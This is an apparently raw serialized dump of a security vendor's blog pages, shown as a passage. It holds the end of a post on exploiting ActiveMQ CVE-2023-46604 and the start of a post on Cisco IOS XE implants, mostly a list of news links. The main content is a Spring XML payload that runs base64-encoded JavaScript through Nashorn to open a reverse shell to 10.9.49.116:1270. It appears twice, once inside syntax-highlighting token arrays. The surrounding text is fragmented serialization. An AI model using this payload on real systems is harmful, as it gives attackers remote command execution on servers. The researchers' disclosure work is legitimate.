http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n    \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n     \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode(&quot;dmFyIHNoZWxsID0gImJhc2giOwppZiAoamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLmluZGV4T2YoIldpbmRvd3MiKSAhPSAtMSkgewoJc2hlbGwgPSAiY21kLmV4ZSI7Cn0KdmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihzaGVsbCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoIjEwLjkuNDkuMTE2IiwgMTI3MCk7CnZhciBzb2NrZXRJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKHMuZ2V0SW5wdXRTdHJlYW0oKSkpOwp2YXIgc29ja2V0T3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRXcml0ZXIobmV3IGphdmEuaW8uT3V0cHV0U3RyZWFtV3JpdGVyKHMuZ2V0T3V0cHV0U3RyZWFtKCkpKTsKdmFyIHByb2Nlc3NJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkV3JpdGVyKG5ldyBqYXZhLmlvLk91dHB1dFN0cmVhbVdyaXRlcihwLmdldE91dHB1dFN0cmVhbSgpKSk7CnZhciBwcm9jZXNzT3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7Cgp3aGlsZSAoIXMuaXNDbG9zZWQoKSkgewoJdmFyIGRhdGEKCWlmICgoZGF0YSA9IHNvY2tldElucHV0LnJlYWRMaW5lKCkpICE9IG51bGwpIHsKCQlwcm9jZXNzSW5wdXQud3JpdGUoZGF0YSArICJcbiIpOwoJCXByb2Nlc3NJbnB1dC5mbHVzaCgpCgl9CglqYXZhLmxhbmcuVGhyZWFkLnNsZWVwKDUwKTsKCgl3aGlsZSAocHJvY2Vzc091dHB1dC5yZWFkeSgpICYmIChkYXRhID0gcHJvY2Vzc091dHB1dC5yZWFkKCkpID4gMCkgewoJCQlzb2NrZXRPdXRwdXQud3JpdGUoZGF0YSk7Cgl9Cglzb2NrZXRPdXRwdXQuZmx1c2goKQoJdHJ5IHsKCQlwLmV4aXRWYWx1ZSgpOwoJCWJyZWFrOwoJfSBjYXRjaCAoZSkgewoJfQp9CgpwLmRlc3Ryb3koKTsKcy5jbG9zZSgpOw==&quot;)));')}\"\u002F>\n    
\u003C\u002Fbean>\n\u003C\u002Fbeans>\n",[886,85591,85592,85599,85612,85628,85641,85650,85678,85726,85734],{"__ignoreMap":219},[1373,85593,85594,85596],{"class":1375,"line":1376},[1373,85595,11852],{"class":1383},[1373,85597,85598],{"class":6300},"beans\n",[1373,85600,85601,85604,85606,85608,85610],{"class":1375,"line":220},[1373,85602,85603],{"class":8252},"    xmlns",[1373,85605,5417],{"class":1383},[1373,85607,183],{"class":1387},[1373,85609,84909],{"class":1391},[1373,85611,19057],{"class":1387},[1373,85613,85614,85616,85618,85620,85622,85624,85626],{"class":1375,"line":1266},[1373,85615,85603],{"class":8252},[1373,85617,4606],{"class":51986},[1373,85619,84921],{"class":8252},[1373,85621,5417],{"class":1383},[1373,85623,183],{"class":1387},[1373,85625,84928],{"class":1391},[1373,85627,19057],{"class":1387},[1373,85629,85630,85633,85635,85637,85639],{"class":1375,"line":1852},[1373,85631,85632],{"class":8252},"         xsi",[1373,85634,4606],{"class":51986},[1373,85636,84940],{"class":8252},[1373,85638,5417],{"class":1383},[1373,85640,19057],{"class":1387},[1373,85642,85643,85646,85648],{"class":1375,"line":4692},[1373,85644,85645],{"class":1391},"         http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans 
http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,85647,183],{"class":1387},[1373,85649,6765],{"class":1383},[1373,85651,85652,85654,85656,85658,85660,85662,85664,85666,85668,85670,85672,85674,85676],{"class":1375,"line":4724},[1373,85653,8246],{"class":1383},[1373,85655,84960],{"class":6300},[1373,85657,7911],{"class":8252},[1373,85659,5417],{"class":1383},[1373,85661,183],{"class":1387},[1373,85663,19383],{"class":1391},[1373,85665,183],{"class":1387},[1373,85667,27205],{"class":8252},[1373,85669,5417],{"class":1383},[1373,85671,183],{"class":1387},[1373,85673,85281],{"class":1391},[1373,85675,183],{"class":1387},[1373,85677,6765],{"class":1383},[1373,85679,85680,85682,85684,85686,85688,85690,85693,85695,85697,85699,85701,85704,85706,85708,85710,85713,85715,85717,85719,85722,85724],{"class":1375,"line":4756},[1373,85681,85290],{"class":1383},[1373,85683,85293],{"class":6300},[1373,85685,46496],{"class":8252},[1373,85687,5417],{"class":1383},[1373,85689,183],{"class":1387},[1373,85691,85692],{"class":1391},"file",[1373,85694,183],{"class":1387},[1373,85696,49451],{"class":8252},[1373,85698,5417],{"class":1383},[1373,85700,183],{"class":1387},[1373,85702,85703],{"class":1391},"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new 
java.lang.String(java.util.Base64.decoder.decode(",[1373,85705,7218],{"class":7054},[1373,85707,85318],{"class":2209},[1373,85709,39663],{"class":7054},[1373,85711,85712],{"class":1391},"dmFyIHNoZWxsID0gImJhc2giOwppZiAoamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLmluZGV4T2YoIldpbmRvd3MiKSAhPSAtMSkgewoJc2hlbGwgPSAiY21kLmV4ZSI7Cn0KdmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihzaGVsbCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoIjEwLjkuNDkuMTE2IiwgMTI3MCk7CnZhciBzb2NrZXRJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKG5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKHMuZ2V0SW5wdXRTdHJlYW0oKSkpOwp2YXIgc29ja2V0T3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRXcml0ZXIobmV3IGphdmEuaW8uT3V0cHV0U3RyZWFtV3JpdGVyKHMuZ2V0T3V0cHV0U3RyZWFtKCkpKTsKdmFyIHByb2Nlc3NJbnB1dCA9IG5ldyBqYXZhLmlvLkJ1ZmZlcmVkV3JpdGVyKG5ldyBqYXZhLmlvLk91dHB1dFN0cmVhbVdyaXRlcihwLmdldE91dHB1dFN0cmVhbSgpKSk7CnZhciBwcm9jZXNzT3V0cHV0ID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7Cgp3aGlsZSAoIXMuaXNDbG9zZWQoKSkgewoJdmFyIGRhdGEKCWlmICgoZGF0YSA9IHNvY2tldElucHV0LnJlYWRMaW5lKCkpICE9IG51bGwpIHsKCQlwcm9jZXNzSW5wdXQud3JpdGUoZGF0YSArICJcbiIpOwoJCXByb2Nlc3NJbnB1dC5mbHVzaCgpCgl9CglqYXZhLmxhbmcuVGhyZWFkLnNsZWVwKDUwKTsKCgl3aGlsZSAocHJvY2Vzc091dHB1dC5yZWFkeSgpICYmIChkYXRhID0gcHJvY2Vzc091dHB1dC5yZWFkKCkpID4gMCkgewoJCQlzb2NrZXRPdXRwdXQud3JpdGUoZGF0YSk7Cgl9Cglzb2NrZXRPdXRwdXQuZmx1c2goKQoJdHJ5IHsKCQlwLmV4aXRWYWx1ZSgpOwoJCWJyZWFrOwoJfSBjYXRjaCAoZSkgewoJfQp9CgpwLmRlc3Ryb3koKTsKcy5jbG9zZSgpOw==",[1373,85714,7218],{"class":7054},[1373,85716,85318],{"class":2209},[1373,85718,39663],{"class":7054},[1373,85720,85721],{"class":1391},")));')}",[1373,85723,183],{"class":1387},[1373,85725,85355],{"class":1383},[1373,85727,85728,85730,85732],{"class":1375,"line":4768},[1373,85729,56557],{"class":1383},[1373,85731,84960],{"class":6300},[1373,85733,6765],{"class":1383},[1373,85735,85736,85738,85740],{"class":1375,"line":4792},[1373,85737,46627],{"class":1383},[
1373,85739,84900],{"class":6300},[1373,85741,6765],{"class":1383},[61,85743,1903],{"id":1902},[18,85745,85746,85747,85752],{},"There are currently more than ",[47,85748,85751],{"href":85749,"rel":85750},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.extended_service_name%3D%22ACTIVEMQ%22",[51],"ten thousand"," of internet-facing ActiveMQ servers, and multiple organizations have reported ransomware attacks. Now that we know attackers can execute stealthy attacks using CVE-2023-46604, it’s become even more important to patch your ActiveMQ servers and, ideally, remove them from the internet entirely.",[61,85754,202],{"id":201},[18,85756,85757,85758,982,85761,63281,85764,982,85767,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-46604. For more research like this, see our blogs, ",[47,85759,40447],{"href":53829,"rel":85760},[51],[47,85762,35931],{"href":53837,"rel":85763},[51],[47,85765,1245],{"href":45535,"rel":85766},[51],[47,85768,216],{"href":214,"rel":85769},[51],[2901,85771,85772],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRsjY, html code.shiki 
.sRsjY{--shiki-light:#39ADB5;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: 
var(--shiki-sepia-text-decoration);}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":85774},[85775,85776,85777,85778,85779,85780],{"id":11647,"depth":220,"text":11648},{"id":84830,"depth":220,"text":84831},{"id":85166,"depth":220,"text":85167},{"id":85428,"depth":220,"text":85429},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck finds a new way to exploit ActiveMQ CVE-2023-46604 that allows the attacker to hide in memory and avoid process-based 
detections.",{"slug":85783},"cve-2023-44604-activemq-in-memory","\u002Fblog\u002Fcve-2023-44604-activemq-in-memory",{"title":83349,"description":85781},"blog\u002Fcve-2023-44604-activemq-in-memory",[242],"Kj6_PNp3-YOymMlVUnRfTjpSnV0Q7JUxQHG9LchWzgA",{"id":85790,"title":83511,"articles":85791,"authors":85979,"body":85981,"date":85796,"description":86068,"extension":234,"image":7,"link":7,"meta":86069,"navigation":237,"path":86071,"seo":86072,"series":7,"stem":86073,"subtype":7,"tags":86074,"__hash__":86075},"blog\u002Fblog\u002Fcisco-implants.md",[85792,85797,85800,85803,85806,85809,85812,85815,85818,85822,85825,85828,85831,85834,85837,85839,85842,85845,85848,85851,85854,85857,85861,85863,85866,85869,85872,85875,85879,85882,85885,85888,85891,85894,85898,85902,85905,85908,85911,85915,85920,85923,85926,85929,85932,85936,85939,85943,85945,85948,85951,85955,85958,85961,85964,85968,85972,85975],{"title":85793,"source":85794,"link":85795,"date":85796},"“Cisco buried the lede.” >10,000 network devices backdoored through unpatched 0-day","Ars Technica","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2023\u002F10\u002Factively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control\u002F","2023-10-17",{"title":85798,"source":19479,"link":85799,"date":85796},"Unpatched Zero-Day Being Exploited in the Wild, Cisco Warns","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcisco-warns-unpatched-0-day-being-exploited-in-wild-a-23336",{"title":85801,"source":14373,"link":85802,"date":85796},"Thousands of Cisco IOS XE devices hacked in widespread attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fthousands-of-cisco-ios-xe-devices-hacked-in-widespread-attacks\u002F#google_vignette",{"title":85798,"source":85804,"link":85805,"date":85796},"Careers Info 
Security","https:\u002F\u002Fwww.careersinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85807,"link":85808,"date":85796},"Careers Info Security Asia","https:\u002F\u002Fwww.careersinfosecurity.asia\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85810,"link":85811,"date":85796},"Careers Info Security EU","https:\u002F\u002Fwww.careersinfosecurity.eu\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85813,"link":85814,"date":85796},"Careers Info Security India","https:\u002F\u002Fwww.careersinfosecurity.in\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85816,"link":85817,"date":85796},"Careers Info Security UK","https:\u002F\u002Fwww.careersinfosecurity.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85819,"source":85820,"link":85821,"date":85796},"Cisco IOS XE Devices Have Been ‘Widely Exploited:’ Researcher","CRN","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fcisco-ios-xe-devices-have-been-widely-exploited-researcher",{"title":85823,"source":85820,"link":85824,"date":85796},"Why Cisco IOS XE Attacks Are Setting Off Alarm Bells","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fwhy-cisco-ios-xe-attacks-are-setting-off-alarm-bells",{"title":85798,"source":85826,"link":85827,"date":85796},"CU Info Security","https:\u002F\u002Fwww.cuinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85829,"source":10841,"link":85830,"date":85796},"Cisco’s critical IOS XE software zero day is a ‘bad situation’","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fciscos-critical-ios-xe-zero-day\u002F696791\u002F",{"title":85832,"source":11218,"link":85833,"date":85796},"Zero-Day Alert: Thousands of Cisco IOS XE Systems Now 
Compromised","https:\u002F\u002Fwww.darkreading.com\u002Fattacks-breaches\u002Ften-thousand-cisco-ios-xe-systems-compromised-zero-day-bug",{"title":85798,"source":85835,"link":85836,"date":85796},"Data Breach Today","https:\u002F\u002Fwww.databreachtoday.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85838,"link":85836,"date":85796},"Data Breach Today UK",{"title":85798,"source":85840,"link":85841,"date":85796},"Gov Info Security","https:\u002F\u002Fwww.govinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85843,"link":85844,"date":85796},"Healthcare Info Security","https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85846,"source":84069,"link":85847,"date":85796},"Cisco IOS XE zero-day exploited by attackers to deliver implant (CVE-2023-20198)","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F10\u002F16\u002Fcve-2023-20198\u002F",{"title":85798,"source":85849,"link":85850,"date":85796},"Info Risk Today","https:\u002F\u002Fwww.inforisktoday.com\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85852,"link":85853,"date":85796},"Info Risk Today Asia","https:\u002F\u002Fwww.inforisktoday.asia\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85798,"source":85855,"link":85856,"date":85796},"Info Risk Today UK","https:\u002F\u002Fwww.inforisktoday.co.uk\u002Funpatched-zero-day-being-exploited-in-wild-cisco-warns-a-23336",{"title":85858,"source":85859,"link":85860,"date":85796},"Critical Flaw Leads Hackers to Hijack Thousands of Cisco Devices","PC Mag","https:\u002F\u002Fwww.pcmag.com\u002Fnews\u002Fcritical-flaw-leads-hackers-to-hijack-thousands-of-cisco-devices",{"title":85858,"source":85862,"link":85860,"date":85796},"PC Mag UK",{"title":85864,"source":14390,"link":85865,"date":85796},"CVE-2023-20198 
ZERO-DAY WIDELY EXPLOITED TO INSTALL IMPLANTS ON CISCO IOS XE SYSTEMS","https:\u002F\u002Fsecurityaffairs.com\u002F152626\u002Fhacking\u002Fcve-2023-20198-cisco-ios-xe-devices.html",{"title":85867,"source":12162,"link":85868,"date":85796},"Cisco IOS XE zero-day facing mass exploitation","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366555683\u002FCisco-IOS-XE-zero-day-facing-mass-exploitation",{"title":85870,"source":39566,"link":85871,"date":85796},"Spyware in bogus RedAlert app. Cyberespionage against ASEAN. Cisco 0-day exploited. Security-by-design. Cyber ops in Russia's hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F198",{"title":85873,"source":14382,"link":85874,"date":85796},"Warning: Unpatched Cisco Zero-Day Vulnerability Actively Targeted in the Wild","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fwarning-unpatched-cisco-zero-day.html",{"title":85876,"source":73072,"link":85877,"date":85878},"Cyber Security Headlines: Zero-day attacks affect 10,000 Cisco devices","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-zero-day-attacks-affect-10000-cisco-devices-us-government-warns-of-confluence-vuln-exploitation-d-link-confirms-data-breach\u002F","2023-10-18",{"title":85880,"source":85820,"link":85881,"date":85878},"More Than 34,000 Cisco Devices Compromised Via IOS XE Vulnerability: Researchers","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fmore-than-34-000-cisco-devices-compromised-via-ios-xe-vulnerability-researchers",{"title":85883,"source":11228,"link":85884,"date":85878},"Unidentified attackers breach tens of thousands of Cisco devices","https:\u002F\u002Fcyberscoop.com\u002Fcisco-devices-breach-ios-xe\u002F",{"title":85832,"source":85886,"link":85887,"date":85878},"Network 
Computing","https:\u002F\u002Fwww.networkcomputing.com\u002Fnetwork-security\u002Fzero-day-alert-thousands-cisco-ios-xe-systems-now-compromised",{"title":85889,"source":61436,"link":85890,"date":85878},"Risky Biz News: Mysterious APT compromises Asian government's secure USBs","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fmysterious-apt-compromises-secure-usbs?utm_source=post-email-title&publication_id=852612&post_id=138055094&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email",{"title":85892,"source":14378,"link":85893,"date":85878},"Tens of Thousands of Cisco Devices Hacked via Zero-Day Vulnerability","https:\u002F\u002Fwww.securityweek.com\u002Ftens-of-thousands-of-cisco-devices-hacked-via-zero-day-vulnerability\u002F",{"title":85895,"source":85896,"link":85897,"date":85878},"Notes from the cyber phases of two hybrid wars. Alerts on Cisco, Atlassian vulnerability exploitation. Updated guidance on security by design.","The Cyberwire","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fdaily-podcast\u002F1928\u002Fnotes",{"title":85899,"source":3500,"link":85900,"date":85901},"Fears grow over extent of Cisco IOS XE zero-day","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366556337\u002FFears-grow-over-extent-of-Cisco-IOS-XE-zero-day","2023-10-19",{"title":85903,"source":85820,"link":85904,"date":85901},"Cisco IOS XE Hack: Researchers Find Another ‘Sharp Increase’ In Affected Devices","https:\u002F\u002Fwww.crn.com\u002Fnews\u002Fsecurity\u002Fcisco-ios-xe-hack-researchers-find-another-sharp-increase-in-affected-devices",{"title":85906,"source":23286,"link":85907,"date":85901},"Cisco IOS XE Web UI Vulnerability: A Glimpse into CVE-2023-20198","https:\u002F\u002Fsecurityboulevard.com\u002F2023\u002F10\u002Fcisco-ios-xe-web-ui-vulnerability-a-glimpse-into-cve-2023-20198\u002F",{"title":85909,"source":60939,"link":85910,"date":85901},"Number of Cisco Devices Hacked via Unpatched Vulnerability Increases to 
40,000","https:\u002F\u002Fwww.securityweek.com\u002Fnumber-of-cisco-devices-hacked-via-unpatched-vulnerability-increases-to-40000\u002F",{"title":85912,"source":85913,"link":85914,"date":85901},"More than 40,000 Cisco switches and routers could be infected","The Washington Post","https:\u002F\u002Fwww.washingtonpost.com\u002Fpolitics\u002F2023\u002F10\u002F19\u002Fmore-than-40000-cisco-switches-routers-could-be-infected\u002F",{"title":85916,"source":85917,"link":85918,"date":85919},"Patch Coming for Cisco IOS XE Software Vulnerabilities, Exploitations Mount","Channel Features","https:\u002F\u002Fwww.channelfutures.com\u002Fsecurity\u002Fpatch-coming-for-cisco-ios-xe-software-vulnerabilities-exploitations-mount","2023-10-20",{"title":85921,"source":73072,"link":85922,"date":85919},"Cyber Security Headlines Week in Review: Water cyber-regs rescinded, Cisco zero-day attacks, Signal debunks zero-day","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-week-in-review-water-cyber-regs-rescinded-cisco-zero-day-attacks-signal-debunks-zero-day\u002F",{"title":85924,"source":14390,"link":85925,"date":85919},"CISA ADDS CISCO IOS XE FLAW TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F152763\u002Fhacking\u002Fcisa-adds-cisco-ios-xe-flaw-known-exploited-vulnerabilities-catalog.html",{"title":85927,"source":14390,"link":85928,"date":85919},"TENS OF THOUSANDS CISCO IOS XE DEVICES WERE HACKED BY EXPLOITING CVE-2023-20198","https:\u002F\u002Fsecurityaffairs.com\u002F152744\u002Fhacking\u002Fcisco-ios-xe-attacks-cve-2023-20198.html",{"title":85930,"source":65365,"link":85931,"date":85919},"Cisco identifies another IOS XE vulnerability, with patches coming this weekend","https:\u002F\u002Ftherecord.media\u002Fcisco-ios-xe-vulnerability-patches-coming",{"title":85933,"source":14373,"link":85934,"date":85935},"Cisco discloses new IOS XE zero-day exploited to deploy malware 
implant","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisco-discloses-new-ios-xe-zero-day-exploited-to-deploy-malware-implant\u002F#google_vignette","2023-10-23",{"title":85937,"source":11218,"link":85938,"date":85935},"Cyberattackers Alter Implant on 30K Compromised Cisco IOS XE Devices","https:\u002F\u002Fwww.darkreading.com\u002Fremote-workforce\u002Fcyberattackers-alter-implant-30k-compromised-cisco-ios-xe-devices",{"title":85940,"source":85941,"link":85942,"date":85935},"Group Behind Cisco Device Hijackings Changes Tactics to Evade Detection","PCMag","https:\u002F\u002Fwww.pcmag.com\u002Fnews\u002Fgroup-behind-cisco-device-hijackings-changes-tactics-to-evade-detection",{"title":85940,"source":85944,"link":85942,"date":85935},"PCMag UK",{"title":85946,"source":14390,"link":85947,"date":85935},"CISCO WARNS OF A SECOND IOS XE ZERO-DAY USED TO INFECT DEVICES WORLDWIDE","https:\u002F\u002Fsecurityaffairs.com\u002F152924\u002Fhacking\u002Fcisco-ios-xe-zero-day-cve-2023-20273.html",{"title":85949,"source":3481,"link":85950,"date":85935},"Cisco fixes critical IOS XE bug but malware crew way ahead of them","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F10\u002F23\u002Fcisco_iosxe_fix\u002F",{"title":85952,"source":19479,"link":85953,"date":85954},"Count of Hacked Cisco IOS XE Devices Unexpectedly Plummets","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcount-hacked-cisco-ios-xe-devices-unexpectedly-plummets-a-23371","2023-10-24",{"title":85956,"source":14378,"link":85957,"date":85954},"Number of Cisco Devices Hacked via Zero-Day Remains High as Attackers Update Implant","https:\u002F\u002Fwww.securityweek.com\u002Fnumber-of-cisco-devices-hacked-via-zero-day-remains-high-as-attackers-update-implant\u002F",{"title":85959,"source":14382,"link":85960,"date":85954},"Backdoor Implant on Hacked Cisco Devices Modified to Evade 
Detection","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fbackdoor-implant-on-hacked-cisco.html",{"title":85962,"source":12162,"link":85963,"date":61851},"Cisco IOS XE instances still under attack, patch now","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366556900\u002FCisco-IOS-XE-instances-still-under-attack-patch-now",{"title":85965,"source":14390,"link":85966,"date":85967},"EXPERTS RELEASED POC EXPLOIT CODE FOR CISCO IOS XE FLAW CVE-2023-20198","https:\u002F\u002Fsecurityaffairs.com\u002F153285\u002Fhacking\u002Fcisco-ios-xe-cve-2023-20198-poc.html","2023-10-31",{"title":85969,"source":73125,"link":85970,"date":85971},"10 of the biggest zero-day attacks of 2023","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Ffeature\u002F10-of-the-biggest-zero-day-attacks-of-2023","2024-01-04",{"title":85973,"source":14386,"link":85974,"date":69142},"Cisco VPN Routers Flaw Let Attackers Execute Remote Code","https:\u002F\u002Fcybersecuritynews.com\u002Fcisco-vpn-routers-flaw\u002F",{"title":85976,"source":85794,"link":85977,"date":85978},"Canadian telecom hacked by suspected China state group","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2025\u002F06\u002Fsuspected-china-state-hackers-exploited-patched-flaw-to-breach-canadian-telecom\u002F","2025-06-23",[85980],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":85982,"toc":86066},[85983,85986,85998,86024,86035,86042,86048,86051,86063],[263,85984],{":list":85985,"ico":266,"title":83511},"[\"CVE-2023-20198 appears to have been widely exploited to install implants on Cisco IOS XE systems.\",\"VulnCheck performed an internet scan and found thousands of implanted hosts.\",\"VulnCheck released a scanner to detect the implant on affected devices.\"]",[18,85987,85988,85989,85993,85994,85997],{},"On October 16, 2023 Cisco 
